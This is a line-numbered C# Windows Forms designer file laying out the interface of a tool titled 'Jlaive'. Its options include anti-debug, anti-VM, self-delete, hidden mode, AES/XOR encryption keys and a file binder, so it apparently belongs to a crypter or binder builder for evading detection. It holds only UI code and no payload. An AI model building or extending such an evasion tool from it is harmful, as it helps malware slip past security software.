13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | ///

26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | ///

29 | private void InitializeComponent() 30 | { 31 | this.label1 = new System.Windows.Forms.Label(); 32 | this.textBox1 = new System.Windows.Forms.TextBox(); 33 | this.openButton = new System.Windows.Forms.Button(); 34 | this.antiDebug = new System.Windows.Forms.CheckBox(); 35 | this.buildButton = new System.Windows.Forms.Button(); 36 | this.selfDelete = new System.Windows.Forms.CheckBox(); 37 | this.hidden = new System.Windows.Forms.CheckBox(); 38 | this.antiVM = new System.Windows.Forms.CheckBox(); 39 | this.tabControl1 = new System.Windows.Forms.TabControl(); 40 | this.optionsPage = new System.Windows.Forms.TabPage(); 41 | this.encryptionPage = new System.Windows.Forms.TabPage(); 42 | this.refreshKeys = new System.Windows.Forms.Button(); 43 | this.iv6 = new System.Windows.Forms.TextBox(); 44 | this.iv1 = new System.Windows.Forms.TextBox(); 45 | this.key2 = new System.Windows.Forms.TextBox(); 46 | this.label3 = new System.Windows.Forms.Label(); 47 | this.key1 = new System.Windows.Forms.TextBox(); 48 | this.label2 = new System.Windows.Forms.Label(); 49 | this.xorEncryption = new System.Windows.Forms.CheckBox(); 50 | this.aesEncryption = new System.Windows.Forms.CheckBox(); 51 | this.binderPage = new System.Windows.Forms.TabPage(); 52 | this.removeFile = new System.Windows.Forms.Button(); 53 | this.addFile = new System.Windows.Forms.Button(); 54 | this.listBox1 = new System.Windows.Forms.ListBox(); 55 | this.outputPage = new System.Windows.Forms.TabPage(); 56 | this.listBox2 = new System.Windows.Forms.ListBox(); 57 | this.tabControl1.SuspendLayout(); 58 | this.optionsPage.SuspendLayout(); 59 | this.encryptionPage.SuspendLayout(); 60 | this.binderPage.SuspendLayout(); 61 | this.outputPage.SuspendLayout(); 62 | this.SuspendLayout(); 63 | // 64 | // label1 65 | // 66 | this.label1.AutoSize = true; 67 | this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 68 | this.label1.Location = new System.Drawing.Point(9, 14); 69 | this.label1.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0); 70 | this.label1.Name = "label1"; 71 | this.label1.Size = new System.Drawing.Size(67, 18); 72 | this.label1.TabIndex = 0; 73 | this.label1.Text = "File path:"; 74 | // 75 | // textBox1 76 | // 77 | this.textBox1.Location = new System.Drawing.Point(12, 35); 78 | this.textBox1.Margin = new System.Windows.Forms.Padding(2); 79 | this.textBox1.Name = "textBox1"; 80 | this.textBox1.Size = new System.Drawing.Size(469, 22); 81 | this.textBox1.TabIndex = 1; 82 | // 83 | // openButton 84 | // 85 | this.openButton.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right))); 86 | this.openButton.Location = new System.Drawing.Point(485, 34); 87 | this.openButton.Margin = new System.Windows.Forms.Padding(2); 88 | this.openButton.Name = "openButton"; 89 | this.openButton.Size = new System.Drawing.Size(75, 25); 90 | this.openButton.TabIndex = 2; 91 | this.openButton.Text = "..."; 92 | this.openButton.UseVisualStyleBackColor = true; 93 | this.openButton.Click += new System.EventHandler(this.openButton_Click); 94 | // 95 | // antiDebug 96 | // 97 | this.antiDebug.AutoSize = true; 98 | this.antiDebug.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 99 | this.antiDebug.Location = new System.Drawing.Point(4, 4); 100 | this.antiDebug.Margin = new System.Windows.Forms.Padding(2); 101 | this.antiDebug.Name = "antiDebug"; 102 | this.antiDebug.Size = new System.Drawing.Size(101, 22); 103 | this.antiDebug.TabIndex = 6; 104 | this.antiDebug.Text = "Anti Debug"; 105 | this.antiDebug.UseVisualStyleBackColor = true; 106 | // 107 | // buildButton 108 | // 109 | this.buildButton.Location = new System.Drawing.Point(11, 359); 110 | this.buildButton.Margin = new System.Windows.Forms.Padding(2); 111 | this.buildButton.Name = "buildButton"; 112 | this.buildButton.Size = new System.Drawing.Size(550, 48); 113 | this.buildButton.TabIndex = 7; 114 | this.buildButton.Text = "Build"; 115 | this.buildButton.UseVisualStyleBackColor = true; 116 | this.buildButton.Click += new System.EventHandler(this.buildButton_Click); 117 | // 118 | // selfDelete 119 | // 120 | this.selfDelete.AutoSize = true; 121 | this.selfDelete.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 122 | this.selfDelete.Location = new System.Drawing.Point(4, 56); 123 | this.selfDelete.Margin = new System.Windows.Forms.Padding(2); 124 | this.selfDelete.Name = "selfDelete"; 125 | this.selfDelete.Size = new System.Drawing.Size(98, 22); 126 | this.selfDelete.TabIndex = 8; 127 | this.selfDelete.Text = "Self delete"; 128 | this.selfDelete.UseVisualStyleBackColor = true; 129 | // 130 | // hidden 131 | // 132 | this.hidden.AutoSize = true; 133 | this.hidden.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 134 | this.hidden.Location = new System.Drawing.Point(4, 82); 135 | this.hidden.Margin = new System.Windows.Forms.Padding(2); 136 | this.hidden.Name = "hidden"; 137 | this.hidden.Size = new System.Drawing.Size(76, 22); 138 | this.hidden.TabIndex = 9; 139 | this.hidden.Text = "Hidden"; 140 | this.hidden.UseVisualStyleBackColor = true; 141 | // 142 | // antiVM 143 | // 144 | this.antiVM.AutoSize = true; 145 | this.antiVM.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 146 | this.antiVM.Location = new System.Drawing.Point(4, 30); 147 | this.antiVM.Margin = new System.Windows.Forms.Padding(2); 148 | this.antiVM.Name = "antiVM"; 149 | this.antiVM.Size = new System.Drawing.Size(80, 22); 150 | this.antiVM.TabIndex = 10; 151 | this.antiVM.Text = "Anti VM"; 152 | this.antiVM.UseVisualStyleBackColor = true; 153 | // 154 | // tabControl1 155 | // 156 | this.tabControl1.Controls.Add(this.optionsPage); 157 | this.tabControl1.Controls.Add(this.encryptionPage); 158 | this.tabControl1.Controls.Add(this.binderPage); 159 | this.tabControl1.Controls.Add(this.outputPage); 160 | this.tabControl1.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 161 | this.tabControl1.Location = new System.Drawing.Point(12, 65); 162 | this.tabControl1.Margin = new System.Windows.Forms.Padding(2); 163 | this.tabControl1.Name = "tabControl1"; 164 | this.tabControl1.SelectedIndex = 0; 165 | this.tabControl1.Size = new System.Drawing.Size(548, 290); 166 | this.tabControl1.TabIndex = 11; 167 | // 168 | // optionsPage 169 | // 170 | this.optionsPage.Controls.Add(this.hidden); 171 | this.optionsPage.Controls.Add(this.selfDelete); 172 | this.optionsPage.Controls.Add(this.antiDebug); 173 | this.optionsPage.Controls.Add(this.antiVM); 174 | this.optionsPage.Location = new System.Drawing.Point(4, 26); 175 | this.optionsPage.Margin = new System.Windows.Forms.Padding(2); 176 | this.optionsPage.Name = "optionsPage"; 177 | this.optionsPage.Padding = new System.Windows.Forms.Padding(2); 178 | this.optionsPage.Size = new System.Drawing.Size(540, 260); 179 | this.optionsPage.TabIndex = 0; 180 | this.optionsPage.Text = "Options"; 181 | this.optionsPage.UseVisualStyleBackColor = true; 182 | // 183 | // encryptionPage 184 | // 185 | this.encryptionPage.Controls.Add(this.refreshKeys); 186 | this.encryptionPage.Controls.Add(this.iv6); 187 | this.encryptionPage.Controls.Add(this.iv1); 188 | this.encryptionPage.Controls.Add(this.key2); 189 | this.encryptionPage.Controls.Add(this.label3); 190 | this.encryptionPage.Controls.Add(this.key1); 191 | this.encryptionPage.Controls.Add(this.label2); 192 | this.encryptionPage.Controls.Add(this.xorEncryption); 193 | this.encryptionPage.Controls.Add(this.aesEncryption); 194 | this.encryptionPage.Location = new System.Drawing.Point(4, 26); 195 | this.encryptionPage.Margin = new System.Windows.Forms.Padding(2); 196 | this.encryptionPage.Name = "encryptionPage"; 197 | this.encryptionPage.Padding = new System.Windows.Forms.Padding(2); 198 | this.encryptionPage.Size = new System.Drawing.Size(540, 260); 199 | this.encryptionPage.TabIndex = 1; 200 | this.encryptionPage.Text = "Encryption"; 201 | this.encryptionPage.UseVisualStyleBackColor = true; 202 | // 203 | // refreshKeys 204 | // 205 | this.refreshKeys.Location = new System.Drawing.Point(164, 194); 206 | this.refreshKeys.Margin = new System.Windows.Forms.Padding(2); 207 | this.refreshKeys.Name = "refreshKeys"; 208 | this.refreshKeys.Size = new System.Drawing.Size(114, 25); 209 | this.refreshKeys.TabIndex = 9; 210 | this.refreshKeys.Text = "Refresh keys"; 211 | this.refreshKeys.UseVisualStyleBackColor = true; 212 | this.refreshKeys.Click += new System.EventHandler(this.UpdateKeys); 213 | // 214 | // iv6 215 | // 216 | this.iv6.Location = new System.Drawing.Point(52, 156); 217 | this.iv6.Margin = new System.Windows.Forms.Padding(2); 218 | this.iv6.Name = "iv6"; 219 | this.iv6.ReadOnly = true; 220 | this.iv6.Size = new System.Drawing.Size(226, 23); 221 | this.iv6.TabIndex = 8; 222 | // 223 | // iv1 224 | // 225 | this.iv1.Location = new System.Drawing.Point(52, 128); 226 | this.iv1.Margin = new System.Windows.Forms.Padding(2); 227 | this.iv1.Name = "iv1"; 228 | this.iv1.ReadOnly = true; 229 | this.iv1.Size = new System.Drawing.Size(226, 23); 230 | this.iv1.TabIndex = 7; 231 | // 232 | // key2 233 | // 234 | this.key2.Location = new System.Drawing.Point(52, 96); 235 | this.key2.Margin = new System.Windows.Forms.Padding(2); 236 | this.key2.Name = "key2"; 237 | this.key2.ReadOnly = true; 238 | this.key2.Size = new System.Drawing.Size(226, 23); 239 | this.key2.TabIndex = 6; 240 | // 241 | // label3 242 | // 243 | this.label3.AutoSize = true; 244 | this.label3.Location = new System.Drawing.Point(18, 131); 245 | this.label3.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0); 246 | this.label3.Name = "label3"; 247 | this.label3.Size = new System.Drawing.Size(31, 17); 248 | this.label3.TabIndex = 5; 249 | this.label3.Text = "IVs:"; 250 | // 251 | // key1 252 | // 253 | this.key1.Location = new System.Drawing.Point(52, 71); 254 | this.key1.Margin = new System.Windows.Forms.Padding(2); 255 | this.key1.Name = "key1"; 256 | this.key1.ReadOnly = true; 257 | this.key1.Size = new System.Drawing.Size(226, 23); 258 | this.key1.TabIndex = 3; 259 | // 260 | // label2 261 | // 262 | this.label2.AutoSize = true; 263 | this.label2.Location = new System.Drawing.Point(6, 71); 264 | this.label2.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0); 265 | this.label2.Name = "label2"; 266 | this.label2.Size = new System.Drawing.Size(43, 17); 267 | this.label2.TabIndex = 2; 268 | this.label2.Text = "Keys:"; 269 | // 270 | // xorEncryption 271 | // 272 | this.xorEncryption.AutoSize = true; 273 | this.xorEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 274 | this.xorEncryption.Location = new System.Drawing.Point(4, 30); 275 | this.xorEncryption.Margin = new System.Windows.Forms.Padding(2); 276 | this.xorEncryption.Name = "xorEncryption"; 277 | this.xorEncryption.Size = new System.Drawing.Size(63, 22); 278 | this.xorEncryption.TabIndex = 1; 279 | this.xorEncryption.Text = "XOR"; 280 | this.xorEncryption.UseVisualStyleBackColor = true; 281 | this.xorEncryption.CheckedChanged += new System.EventHandler(this.xorEncryption_CheckedChanged); 282 | // 283 | // aesEncryption 284 | // 285 | this.aesEncryption.AutoSize = true; 286 | this.aesEncryption.Checked = true; 287 | this.aesEncryption.CheckState = System.Windows.Forms.CheckState.Checked; 288 | this.aesEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 289 | this.aesEncryption.Location = new System.Drawing.Point(4, 4); 290 | this.aesEncryption.Margin = new System.Windows.Forms.Padding(2); 291 | this.aesEncryption.Name = "aesEncryption"; 292 | this.aesEncryption.Size = new System.Drawing.Size(59, 22); 293 | this.aesEncryption.TabIndex = 0; 294 | this.aesEncryption.Text = "AES"; 295 | this.aesEncryption.UseVisualStyleBackColor = true; 296 | this.aesEncryption.CheckedChanged += new System.EventHandler(this.aesEncryption_CheckedChanged); 297 | // 298 | // binderPage 299 | // 300 | this.binderPage.Controls.Add(this.removeFile); 301 | this.binderPage.Controls.Add(this.addFile); 302 | this.binderPage.Controls.Add(this.listBox1); 303 | this.binderPage.Location = new System.Drawing.Point(4, 26); 304 | this.binderPage.Margin = new System.Windows.Forms.Padding(2); 305 | this.binderPage.Name = "binderPage"; 306 | this.binderPage.Padding = new System.Windows.Forms.Padding(2); 307 | this.binderPage.Size = new System.Drawing.Size(540, 260); 308 | this.binderPage.TabIndex = 2; 309 | this.binderPage.Text = "Binder"; 310 | this.binderPage.UseVisualStyleBackColor = true; 311 | // 312 | // removeFile 313 | // 314 | this.removeFile.Location = new System.Drawing.Point(122, 221); 315 | this.removeFile.Margin = new System.Windows.Forms.Padding(2); 316 | this.removeFile.Name = "removeFile"; 317 | this.removeFile.Size = new System.Drawing.Size(116, 34); 318 | this.removeFile.TabIndex = 2; 319 | this.removeFile.Text = "Remove file"; 320 | this.removeFile.UseVisualStyleBackColor = true; 321 | this.removeFile.Click += new System.EventHandler(this.removeFile_Click); 322 | // 323 | // addFile 324 | // 325 | this.addFile.Location = new System.Drawing.Point(2, 221); 326 | this.addFile.Margin = new System.Windows.Forms.Padding(2); 327 | this.addFile.Name = "addFile"; 328 | this.addFile.Size = new System.Drawing.Size(116, 34); 329 | this.addFile.TabIndex = 1; 330 | this.addFile.Text = "Add file"; 331 | this.addFile.UseVisualStyleBackColor = true; 332 | this.addFile.Click += new System.EventHandler(this.addFile_Click); 333 | // 334 | // listBox1 335 | // 336 | this.listBox1.FormattingEnabled = true; 337 | this.listBox1.ItemHeight = 17; 338 | this.listBox1.Location = new System.Drawing.Point(2, 5); 339 | this.listBox1.Margin = new System.Windows.Forms.Padding(2); 340 | this.listBox1.Name = "listBox1"; 341 | this.listBox1.Size = new System.Drawing.Size(532, 208); 342 | this.listBox1.TabIndex = 0; 343 | // 344 | // outputPage 345 | // 346 | this.outputPage.Controls.Add(this.listBox2); 347 | this.outputPage.Location = new System.Drawing.Point(4, 26); 348 | this.outputPage.Margin = new System.Windows.Forms.Padding(2); 349 | this.outputPage.Name = "outputPage"; 350 | this.outputPage.Padding = new System.Windows.Forms.Padding(2); 351 | this.outputPage.Size = new System.Drawing.Size(540, 260); 352 | this.outputPage.TabIndex = 3; 353 | this.outputPage.Text = "Output"; 354 | this.outputPage.UseVisualStyleBackColor = true; 355 | // 356 | // listBox2 357 | // 358 | this.listBox2.FormattingEnabled = true; 359 | this.listBox2.ItemHeight = 17; 360 | this.listBox2.Location = new System.Drawing.Point(4, 4); 361 | this.listBox2.Margin = new System.Windows.Forms.Padding(2); 362 | this.listBox2.Name = "listBox2"; 363 | this.listBox2.Size = new System.Drawing.Size(532, 242); 364 | this.listBox2.TabIndex = 4; 365 | // 366 | // Form1 367 | // 368 | this.AutoScaleDimensions = new System.Drawing.SizeF(120F, 120F); 369 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Dpi; 370 | this.ClientSize = new System.Drawing.Size(571, 418); 371 | this.Controls.Add(this.tabControl1); 372 | this.Controls.Add(this.buildButton); 373 | this.Controls.Add(this.openButton); 374 | this.Controls.Add(this.textBox1); 375 | this.Controls.Add(this.label1); 376 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle; 377 | this.Margin = new System.Windows.Forms.Padding(2); 378 | this.MaximizeBox = false; 379 | this.Name = "Form1"; 380 | this.ShowIcon = false; 381 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; 382 | this.Text = "Jlaive"; 383 | this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Form1_FormClosing); 384 | this.Load += new System.EventHandler(this.Form1_Load); 385 | this.tabControl1.ResumeLayout(false); 386 | this.optionsPage.ResumeLayout(false); 387 | this.optionsPage.PerformLayout(); 388 | this.encryptionPage.ResumeLayout(false); 389 | this.encryptionPage.PerformLayout(); 390 | this.binderPage.ResumeLayout(false); 391 | this.outputPage.ResumeLayout(false); 392 | this.ResumeLayout(false); 393 | this.PerformLayout(); 394 | 395 | } 396 | 397 | #endregion 398 | 399 | private System.Windows.Forms.Label label1; 400 | private System.Windows.Forms.TextBox textBox1; 401 | private System.Windows.Forms.Button openButton; 402 | private System.Windows.Forms.CheckBox antiDebug; 403 | private System.Windows.Forms.Button buildButton; 404 | private System.Windows.Forms.CheckBox selfDelete; 405 | private System.Windows.Forms.CheckBox hidden; 406 | private System.Windows.Forms.CheckBox antiVM; 407 | private System.Windows.Forms.TabControl tabControl1; 408 | private System.Windows.Forms.TabPage optionsPage; 409 | private System.Windows.Forms.TabPage encryptionPage; 410 | private System.Windows.Forms.CheckBox aesEncryption; 411 | private System.Windows.Forms.CheckBox xorEncryption; 412 | private System.Windows.Forms.TabPage binderPage; 413 | private System.Windows.Forms.TabPage outputPage; 414 | private System.Windows.Forms.Label label2; 415 | private System.Windows.Forms.TextBox key1; 416 | private System.Windows.Forms.Label label3; 417 | private System.Windows.Forms.Button addFile; 418 | private System.Windows.Forms.ListBox listBox1; 419 | private System.Windows.Forms.TextBox iv6; 420 | private System.Windows.Forms.TextBox iv1; 421 | private System.Windows.Forms.TextBox key2; 422 | private System.Windows.Forms.Button refreshKeys; 423 | private System.Windows.Forms.Button removeFile; 424 | private System.Windows.Forms.ListBox listBox2; 425 | } 426 | } 427 | --------------------------------------------------------------------------------